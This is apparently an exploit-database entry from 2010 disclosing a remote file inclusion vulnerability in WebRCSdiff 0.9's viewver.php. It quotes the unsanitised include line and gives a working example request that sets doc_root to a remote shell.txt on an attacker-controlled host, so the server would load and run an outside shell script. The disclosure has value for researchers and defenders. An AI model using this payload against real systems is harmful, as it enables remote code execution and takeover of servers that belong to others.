WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion

EDB-ID:

15567

CVE:

N/A


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-11-18


========================================================
= Author: Fl0riX - Bug Researchers

= Application  Name : WebRCSdiff 0.9

= Vulnerable  Type: Remote File Inclusion

= Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download

= Risk : High

= Infection: Uzaktan Dosya Dahil edilebilir.

========================================================

=
 Error c0d3;
     include ("$doc_root/dir_config.php");

========================================================

=
 Example;
 site/viewver?doc_root=http://fl0rix/shell.txt?
========================================================